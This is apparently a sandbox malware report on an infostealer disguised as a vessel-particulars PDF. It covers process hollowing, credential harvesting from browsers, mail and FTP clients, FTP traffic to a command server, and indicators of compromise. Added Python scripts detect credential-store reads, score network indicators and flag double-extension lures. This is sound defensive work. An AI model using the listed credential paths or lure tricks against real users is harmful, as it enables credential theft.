    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
    Source: name.exe Binary or memory string: WIN_XP
    Source: name.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
    Source: name.exe Binary or memory string: WIN_XPe
    Source: name.exe Binary or memory string: WIN_VISTA
    Source: name.exe Binary or memory string: WIN_7
    Source: name.exe Binary or memory string: WIN_8
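Taken one at a time, several of the accesses above are unremarkable: a browser opening its own Login Data or a mail client reading its profiles.ini is normal. The signal is one process, here the hollowed RegSvcs.exe, reading the stores of many unrelated applications in succession. The following added example (not the report's or the sandbox vendor's code) lists the store paths and registry keys recorded above, pairs each with the process that legitimately owns it, and reports any process that reads three or more families it does not own. The owner process names, the family labels, the three-family threshold and the access records are assumptions made for illustration; stores for which no owner is asserted are flagged on any access.

```python
"""Which process is reading whose credential store?

Added example: the store list is taken from the paths in the report above;
the owning process names, the family labels, the threshold and the access
records are assumptions made for illustration, not data from the report.
"""
import re
from collections import defaultdict

# (family, pattern applied to the lower-cased file/registry path,
#  processes allowed to read it). An empty owner set flags every access.
CREDENTIAL_STORES = [
    ("chrome-logins",
     r"\\google\\chrome\\user data\\[^\\]+\\login data$", {"chrome.exe"}),
    ("edge-logins",
     r"\\microsoft\\edge\\user data\\[^\\]+\\login data$", {"msedge.exe"}),
    ("firefox-profile", r"\\mozilla\\firefox\\profiles\.ini$", {"firefox.exe"}),
    ("thunderbird-profile", r"\\thunderbird\\profiles\.ini$", {"thunderbird.exe"}),
    ("cyberfox-profile", r"\\8pecxstudios\\cyberfox\\profiles\.ini$", set()),
    ("blackhawk-profile", r"\\netgate technologies\\blackhawk\\profiles\.ini$", set()),
    ("winscp-sessions",
     r"^hkey_current_user\\software\\martin prikryl\\winscp 2\\sessions$", {"winscp.exe"}),
    ("mapi-profiles", r"\\windows messaging subsystem\\profiles$", {"outlook.exe"}),
    ("incredimail-identities",
     r"^hkey_current_user\\software\\incredimail\\identities$", set()),
    ("ftp-navigator-list", r"^c:\\ftp navigator\\ftplist\.txt$", set()),
]
_COMPILED = [(fam, re.compile(pat), owners) for fam, pat, owners in CREDENTIAL_STORES]


def classify(path: str):
    """Return the credential-store family a file or registry path belongs to."""
    lowered = path.lower()
    for family, rx, _ in _COMPILED:
        if rx.search(lowered):
            return family
    return None


def foreign_accesses(events) -> dict:
    """process -> set of store families it opened without owning them."""
    touched = defaultdict(set)
    for process, path in events:
        family = classify(path)
        if family is None:
            continue
        owners = next(o for f, _, o in _COMPILED if f == family)
        if process.lower() not in owners:
            touched[process].add(family)
    return dict(touched)


def harvesters(events, threshold: int = 3) -> list:
    """Processes whose foreign store reads span at least `threshold` families."""
    return sorted((proc, sorted(fams))
                  for proc, fams in foreign_accesses(events).items()
                  if len(fams) >= threshold)


# Constructed (process, path) access records; the RegSvcs.exe rows reuse the
# paths from the report, the remaining rows are benign controls.
EVENTS = [
    ("RegSvcs.exe", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    ("RegSvcs.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("RegSvcs.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("RegSvcs.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ("RegSvcs.exe", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    ("RegSvcs.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    ("RegSvcs.exe", r"C:\FTP Navigator\Ftplist.txt"),
    ("chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("firefox.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("explorer.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
]

if __name__ == "__main__":
    for process, families in harvesters(EVENTS):
        print(process, "read", len(families), "foreign stores:", ", ".join(families))
```

The owner mapping suppresses the two benign rows, the single explorer.exe read stays below the threshold, and RegSvcs.exe surfaces with seven foreign families. Raising the threshold trades sensitivity for fewer false positives on backup and indexing agents, which are the usual legitimate readers of several of these paths.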

    Remote Access Functionality

    Source: Yara match File source: dump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
    MITRE ATT&CK matrix (the original is a 14-column table that the extraction flattened; it is rebuilt here as one line per tactic). Only techniques that carried a signature-count badge in the matrix are listed, with the badge digits in brackets exactly as shown; the remaining cells were unmatched placeholder techniques and are omitted. Badges count matched sandbox signatures, not confirmed operator behaviour.

    Reconnaissance: no matched techniques
    Resource Development: Scripting [111] (placed under this tactic by the report)
    Initial Access: Valid Accounts [2]
    Execution: Windows Management Instrumentation [121]; Native API [2]; Shared Modules [1]; Command and Scripting Interpreter [2]
    Persistence: Scripting [111]; DLL Side-Loading [1]; Valid Accounts [2]; Registry Run Keys / Startup Folder [2]
    Privilege Escalation: Exploitation for Privilege Escalation [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [312]; Registry Run Keys / Startup Folder [2]
    Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [12]; DLL Side-Loading [1]; Masquerading [11]; Valid Accounts [2]; Virtualization/Sandbox Evasion [121]; Access Token Manipulation [21]; Process Injection [312]
    Credential Access: OS Credential Dumping [2]; Input Capture [21]; Credentials in Registry [1]
    Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [3]; System Information Discovery [128]; Security Software Discovery [331]; Virtualization/Sandbox Evasion [121]; Process Discovery [2]; Application Window Discovery [11]; System Owner/User Discovery [1]; System Network Configuration Discovery [1]
    Lateral Movement: no matched techniques
    Collection: Archive Collected Data [1]; Data from Local System [2]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]
    Command and Control: Ingress Tool Transfer [2]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [23]
    Exfiltration: Exfiltration Over Alternative Protocol [1]
    Impact: System Shutdown/Reboot [1]
    Behavior Graph ID: 1519011; Sample: INDIA - VSL PARTICULARS.pdf.exe; Startdate: 26/09/2024; Architecture: WINDOWS; Score: 100

    The original is a rendered graph with a colour legend (process, signature, created file, DNS/IP info, dropped, Windows process, source language, malicious, Internet); it is rebuilt here as a process tree with each node's dropped files, network contacts and signatures.

    Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 9 other signatures
    Contacted hosts: beirutrest.com; api.ipify.org

    • INDIA - VSL PARTICULARS.pdf.exe (started)
      • dropped: C:\Users\user\AppData\Local\...\name.exe, PE32
      • name.exe (started)
        • dropped: C:\Users\user\AppData\Roaming\...\name.vbs, data
        • signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures
        • RegSvcs.exe (started)
          • beirutrest.com, 50.87.144.157, ports 21, 35284, 49713, UNIFIEDLAYER-AS-1US, United States
          • api.ipify.org, 104.26.12.205, ports 443, 49712, 49718, CLOUDFLARENETUS, United States
          • signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access)
    • wscript.exe (started)
      • signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
      • name.exe (started)
        • name.exe (started)
          • signature: Sample uses process hollowing technique
          • name.exe (started)
            • signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
            • RegSvcs.exe (started)
              • signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
          • RegSvcs.exe (started)
        • RegSvcs.exe (started)

    Antivirus, machine-learning and reputation detections (source, detection, scanner, label)

    Initial sample:
    • INDIA - VSL PARTICULARS.pdf.exe: 27% Virustotal; 100% Avira, HEUR/AGEN.1321671; 100% Joe Sandbox ML

    Dropped files:
    • C:\Users\user\AppData\Local\directory\name.exe: 100% Avira, HEUR/AGEN.1321671; 100% Joe Sandbox ML; 34% ReversingLabs, Win32.Trojan.Generic

    The next two detection tables (unpacked PE files and domains in the standard report layout): No Antivirus matches

    URLs:
    • https://api.ipify.org/: 0% URL Reputation, safe
    Contacted domains (name, IP, active, malicious, antivirus detection, reputation):
    • beirutrest.com: 50.87.144.157, active: true, malicious: true, reputation: unknown
    • api.ipify.org: 104.26.12.205, active: true, malicious: false, reputation: unknown

    Contacted URLs (name, malicious, antivirus detection, reputation):
    • https://api.ipify.org/: malicious: false, URL Reputation: safe, reputation: unknown

    Contacted IPs (IP, domain, country, ASN, ASN name, malicious):
    • 104.26.12.205: api.ipify.org, United States, ASN 13335 CLOUDFLARENETUS, malicious: false
    • 50.87.144.157: beirutrest.com, United States, ASN 46606 UNIFIEDLAYER-AS-1US, malicious: true
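Reading these tables together with the behavior graph: the graph lists port 21 (the FTP control port) for beirutrest.com, which is the channel the matrix maps to Exfiltration Over Alternative Protocol, while api.ipify.org is a public external-IP lookup service that the report's own context tables show in LummaC, Stealc and Vidar analyses as well. For a hunt that makes the beirutrest.com / 50.87.144.157 pair a high-confidence indicator and the ipify lookup a low-confidence one that only matters in combination. The script below is an added example and not part of the Joe Sandbox report: it loads those indicators and scores constructed log records per source host. The pipe-separated record layout (timestamp|src|dst|dport|kind|name) and the sample records are constructed for the demonstration.

```python
"""Score hosts against the network indicators from this report.

Added example, not part of the Joe Sandbox report. The indicator values are
the report's contacted domains/IPs; the log records and their pipe-separated
layout (timestamp|src|dst|dport|kind|name) are constructed for the demo.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# High confidence: the host the payload talked to on port 21 (report: malicious=true).
HIGH_DOMAINS = {"beirutrest.com"}
HIGH_IPS = {"50.87.144.157"}
# Low confidence: public external-IP lookup; the report's context tables show
# LummaC, Stealc and Vidar samples using it, so alone it is not actionable.
LOW_DOMAINS = {"api.ipify.org"}
LOW_IPS = {"104.26.12.205"}
FTP_PORT = 21  # the port the behavior graph lists for beirutrest.com


@dataclass(frozen=True)
class Event:
    ts: str
    src: str
    dst: str
    dport: int
    kind: str   # "dns" or "conn"
    name: str   # queried name for dns records, empty for conn records


def parse_line(line: str) -> Optional[Event]:
    """Parse one pipe-separated record; blank and '#' lines yield None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = [f.strip() for f in line.split("|")]
    if len(fields) != 6:
        raise ValueError(f"expected 6 fields, got {len(fields)}: {line!r}")
    ts, src, dst, dport, kind, name = fields
    return Event(ts, src, dst, int(dport), kind, name)


def indicator_level(ev: Event) -> Optional[str]:
    """'high', 'low' or None depending on which indicator set the record touches."""
    if ev.name in HIGH_DOMAINS or ev.dst in HIGH_IPS:
        return "high"
    if ev.name in LOW_DOMAINS or ev.dst in LOW_IPS:
        return "low"
    return None


def score_events(events: list[Event]) -> dict[str, dict]:
    """Per source host: verdict level, whether FTP to the C2 IP was seen, and the hits."""
    hits: dict[str, dict[str, list[str]]] = defaultdict(lambda: {"high": [], "low": []})
    ftp_seen: set[str] = set()
    for ev in events:
        level = indicator_level(ev)
        if level is None:
            continue
        what = ev.name or f"{ev.dst}:{ev.dport}"
        hits[ev.src][level].append(f"{ev.ts} {ev.kind} {what}")
        if ev.kind == "conn" and ev.dst in HIGH_IPS and ev.dport == FTP_PORT:
            ftp_seen.add(ev.src)
    verdicts = {}
    for host, h in hits.items():
        verdicts[host] = {
            "level": "high" if h["high"] else "low",
            "ftp_exfil_seen": host in ftp_seen,
            "hits": h["high"] + h["low"],
        }
    return verdicts


# Constructed records (not from the report): 10.0.0.21 reproduces the report's
# sequence (external-IP lookup, then FTP to beirutrest.com); 10.0.0.37 only
# performs the lookup; 10.0.0.42 touches nothing of interest.
SAMPLE_LOG = """\
# ts|src|dst|dport|kind|name
2024-09-26T03:34:10Z|10.0.0.21|10.0.0.2|53|dns|api.ipify.org
2024-09-26T03:34:10Z|10.0.0.21|104.26.12.205|443|conn|
2024-09-26T03:34:12Z|10.0.0.21|10.0.0.2|53|dns|beirutrest.com
2024-09-26T03:34:12Z|10.0.0.21|50.87.144.157|21|conn|
2024-09-26T03:40:00Z|10.0.0.37|10.0.0.2|53|dns|api.ipify.org
2024-09-26T03:40:00Z|10.0.0.37|104.26.12.205|443|conn|
2024-09-26T03:41:00Z|10.0.0.42|10.0.0.2|53|dns|example.com
"""


def run(log_text: str = SAMPLE_LOG) -> dict[str, dict]:
    events = [ev for ev in map(parse_line, log_text.splitlines()) if ev is not None]
    return score_events(events)


if __name__ == "__main__":
    for host, v in sorted(run().items()):
        print(f"{host}: {v['level']} (ftp_exfil_seen={v['ftp_exfil_seen']})")
        for hit in v["hits"]:
            print("   ", hit)
```

The low-confidence bucket exists so that the ipify lookup is kept as supporting evidence on a host that also reached the C2, without paging anyone for the many legitimate and unrelated-malware uses of that service.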
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1519011
        Start date and time:2024-09-26 05:33:06 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 59s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:INDIA - VSL PARTICULARS.pdf.exe
        Detection:MAL
        Classification:mal100.troj.spyw.expl.evad.winEXE@18/3@2/2
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 56
        • Number of non-executed functions: 308
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
    Time / Type / Description:
    • 05:34:07, Autostart: Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
    • 23:34:09, API Interceptor: 1377232x Sleep call for process: RegSvcs.exe modified
    Context: IPs seen in other Joe Sandbox analyses (associated sample name or URL, detection, threat name, context value seen in that analysis)

    104.26.12.205:
    • file.exe: malicious, LummaC, Vidar (api.ipify.org/)
    • SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe: malicious, Unknown (api.ipify.org/)
    • file.exe (5 separate analyses): malicious, LummaC, Stealc, Vidar (api.ipify.org/)
    • file.exe (3 separate analyses): malicious, Unknown (api.ipify.org/)

    50.87.144.157:
    • K. Taean V31 Vessel's Particulars.docx.exe: malicious, AgentTesla, PureLog Stealer
    • IMA GLORY PARTICULARS.pdf.exe: malicious, AgentTesla, PureLog Stealer
    • WOOYANG VENUS PARTICULARS.docx.scr.exe: malicious, AgentTesla
    • MV TBN 58 SHIP PARTICULARS.01.pdf.scr.exe: malicious, AgentTesla
    • Q88_TAI SHAN - 11.09.24.docx.scr.exe: malicious, AgentTesla
    • ZHONG XING HAI PARTICULARS.pdf.scr.exe: malicious, AgentTesla
    • MALED_Q88_10.09.24.doc.scr.exe: malicious, AgentTesla
    • Q88_MT Carol 2024.09.10.doc.scr.exe: malicious, AgentTesla
    • EVER V-2408 - VESSEL DETAILS.xlsx.scr.exe: malicious, AgentTesla
    • CSC LEADER VOY.1 PARTICULARS.pdf.scr.exe: malicious, AgentTesla
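Every sample tied to 50.87.144.157 uses the same lure style: a maritime "vessel particulars" or Q88 document name ending in an executable extension, hidden behind .pdf/.docx/.xlsx (and often a second .scr layer). The script below is an added example and not part of the Joe Sandbox report: it generalises the report's "Suspicious Double Extension" finding into a name classifier and runs it over the lure names from the table above, also catching the right-to-left-override trick. The extension sets are this example's own choice, not a list from the report.

```python
"""Flag file names that hide an executable behind a document extension.

Added example, not part of the Joe Sandbox report. It applies the report's
"Suspicious Double Extension" idea to every lure name in the context tables
above, plus the right-to-left-override trick; the extension sets are this
example's own choice, not a list from the report.
"""

# Names listed under 50.87.144.157 / beirutrest.com in the context tables above.
LURE_NAMES = [
    "INDIA - VSL PARTICULARS.pdf.exe",
    "K. Taean V31 Vessel's Particulars.docx.exe",
    "IMA GLORY PARTICULARS.pdf.exe",
    "WOOYANG VENUS PARTICULARS.docx.scr.exe",
    "MV TBN 58 SHIP PARTICULARS.01.pdf.scr.exe",
    "Q88_TAI SHAN - 11.09.24.docx.scr.exe",
    "ZHONG XING HAI PARTICULARS.pdf.scr.exe",
    "MALED_Q88_10.09.24.doc.scr.exe",
    "Q88_MT Carol 2024.09.10.doc.scr.exe",
    "EVER V-2408 - VESSEL DETAILS.xlsx.scr.exe",
    "CSC LEADER VOY.1 PARTICULARS.pdf.scr.exe",
]

# Assumed extension sets for the demo (extend to taste).
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe", "js", "jse",
                  "wsf", "wsh", "hta", "msi", "lnk", "ps1"}
DOCUMENT_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf", "txt", "csv",
                "jpg", "jpeg", "png", "gif", "zip", "rar", "7z"}
RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE: "invoice<RLO>fdp.exe" renders as "invoiceexe.pdf"


def extension_chain(name: str) -> list:
    """Lower-cased suffixes after the first dot of the base name."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return parts[1:] if len(parts) > 1 else []


def why_deceptive(name: str):
    """Reason string when the name is a lure, else None.

    Windows hides the last extension of known types by default, so
    'PARTICULARS.pdf.exe' is displayed as 'PARTICULARS.pdf'.
    """
    if RLO in name:
        return "right-to-left override character in name"
    chain = extension_chain(name)
    if len(chain) < 2 or chain[-1] not in EXECUTABLE_EXT:
        return None
    lures = [e for e in chain[:-1] if e in DOCUMENT_EXT]
    if lures:
        return f"executable .{chain[-1]} disguised as .{lures[-1]}"
    if chain[-2] in EXECUTABLE_EXT:
        return f"stacked executable extensions .{chain[-2]}.{chain[-1]}"
    return None   # e.g. setup.x86.exe: a dotted version tag is not a lure


def is_deceptive_name(name: str) -> bool:
    return why_deceptive(name) is not None


def classify(names) -> dict:
    return {n: why_deceptive(n) for n in names}


if __name__ == "__main__":
    for n, reason in classify(LURE_NAMES + ["file.exe", "report.pdf", "archive.tar.gz"]).items():
        print(f"{'LURE' if reason else 'ok  '}  {n}  {reason or ''}")
```

The check deliberately ignores names like setup.x86.exe, where the dotted segment before .exe is not a document type, so that it can run on e-mail attachment and download logs without flooding on version tags.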
    Context: domains seen in other Joe Sandbox analyses (associated sample name or URL, detection, threat name, IP the domain resolved to in that analysis)

    beirutrest.com: the same ten AgentTesla / PureLog Stealer samples listed above under 50.87.144.157 (K. Taean V31 Vessel's Particulars.docx.exe through CSC LEADER VOY.1 PARTICULARS.pdf.scr.exe), each resolving beirutrest.com to 50.87.144.157

    api.ipify.org:
    • http://limeac-oawkcc-otmsesrt-iond0-minestoasli.pages.dev/: malicious, HTMLPhisher (172.67.74.152)
    • https://dreativityblocksnodes.pages.dev/: malicious, Unknown (172.67.74.152)
    • https://check-smulti-993054.pages.dev/: malicious, HTMLPhisher (172.67.74.152)
    • file.exe: malicious, LummaC, Vidar (104.26.12.205)
    • SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe: malicious, Unknown (104.26.13.205)
    • SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe: malicious, Unknown (104.26.12.205)
    • file.exe: malicious, LummaC, Vidar (172.67.74.152)
    • file.exe: malicious, LummaC, Vidar (172.67.74.152)
    • file.exe: malicious, LummaC, Stealc, Vidar (104.26.12.205)
    • file.exe: malicious, LummaC, Vidar (104.26.13.205)
    Context: ASNs seen in other Joe Sandbox analyses (associated sample name or URL, detection, threat name, IP seen in that analysis). ASN-level matches on a CDN and a shared-hosting provider are weak pivots: they show that unrelated phishing and malware share these networks, not a link to this campaign.

    CLOUDFLARENETUS:
    • http://tes.lavender8639.workers.dev/: malicious, Unknown (172.67.155.11)
    • https://gfdytre.pages.dev/: malicious, Unknown (172.66.44.67)
    • https://pancakes.multiinx.com/: malicious, Unknown (104.17.25.14)
    • https://bzxr1tfchwjkqxjr8ftb.pages.dev/: malicious, Unknown (188.114.96.3)
    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com: malicious, Unknown (104.16.167.228)
    • https://consolbisezsproslogin.gitbook.io/: malicious, HTMLPhisher (104.16.117.116)
    • https://dfgdhte22.pages.dev/: malicious, HTMLPhisher (172.66.44.209)
    • https://att-mail-109008.weeblysite.com/: malicious, Unknown (104.18.86.42)
    • https://tiktokity.com/: malicious, Unknown (188.114.96.3)
    • https://e95lq1vmgxojxrxkv7.pages.dev/: malicious, Unknown (172.66.47.149)

    UNIFIEDLAYER-AS-1US:
    • https://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/: malicious, Unknown (50.6.153.157)
    • https://abre.ai/k8hX: malicious, Unknown (50.6.153.157)
    • http://nky.beb.mybluehost.me/new/auth/entrar.php: malicious, Unknown (50.6.153.4)
    • https://turkiyecumhuriyetiziraatbankasi.com/: malicious, Unknown (162.240.37.219)
    • https://c81df1b32e6c3c5e06e82397233e2695.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/cmVnaXN0cmF0b3JAc3Uuc2U=: malicious, HTMLPhisher (108.179.252.203)
    • https://aac4b0887827b3598989c48a201d0420.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/bnpheWVkaUBzdGMuY29tLnNh: malicious, HTMLPhisher (108.179.252.203)
    • https://miamibd.com/yahoo: malicious, Unknown (192.185.182.82)
    • https://www.alumni.upenn.edu/redirect.aspx?linkID=11371581&sendId=3557295&eid=208935&gid=2&tokenUrl=https://flow.page/gyphoninvest: malicious, HTMLPhisher (108.167.181.137)
    • https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90: malicious, Unknown (162.241.156.147)
    • message.html: malicious, HTMLPhisher (69.49.245.172)
    Context: TLS client fingerprints (JA3) seen in other Joe Sandbox analyses (associated URL, detection, threat name, IP seen in that analysis)

    3b5074b1b5d032e5620f69f9f700ff0e:
    • https://tk009.shop/: malicious, Unknown (104.26.12.205)
    • https://tk-shops.vip/: malicious, Unknown (104.26.12.205)
    • https://tiktokity.com/: malicious, Unknown (104.26.12.205)
    • https://e95lq1vmgxojxrxkv7.pages.dev/: malicious, Unknown (104.26.12.205)
    • https://www.tiktoksk.top/: malicious, Unknown (104.26.12.205)
    • https://tiktok3.top/: malicious, Unknown (104.26.12.205)
    • https://www.tiktokcp.com/: malicious, Unknown (104.26.12.205)
    • http://european-mall2.com/: malicious, Unknown (104.26.12.205)
    • https://tiktok526.shop/: malicious, Unknown (104.26.12.205)
    • http://227819shop.com/: malicious, Unknown (104.26.12.205)

    Context: dropped files: No context
    Dropped file 1 (the report gives no file name for this entry)
    Process:C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):267264
    Entropy (8bit):7.905293181648068
    Encrypted:false
    SSDEEP:6144:eX2vcKM6KjBK7Yj4zRwZSxHRL7KfWZbO1pEH:orfnVK7u4TPHKOVOY
    MD5:6CE6F2F003596D30981969517B2F2AFB
    SHA1:62EF5BFC194EC38907C3F440BFFA46478ABCC8EE
    SHA-256:FAB3A9B09315324B6B1D477225FF0DC6A60431D70CF1440D28B1CFA279F14894
    SHA-512:B3E3542360DCDC41424DCA92FF44FCB60C9BA37D5B6DDF12856C1433B7AA07664DD547B0934897C65A0A85DC4A579FAB85A97BE124905268ABBF66CE36BDD331
    Malicious:false
    Reputation:low
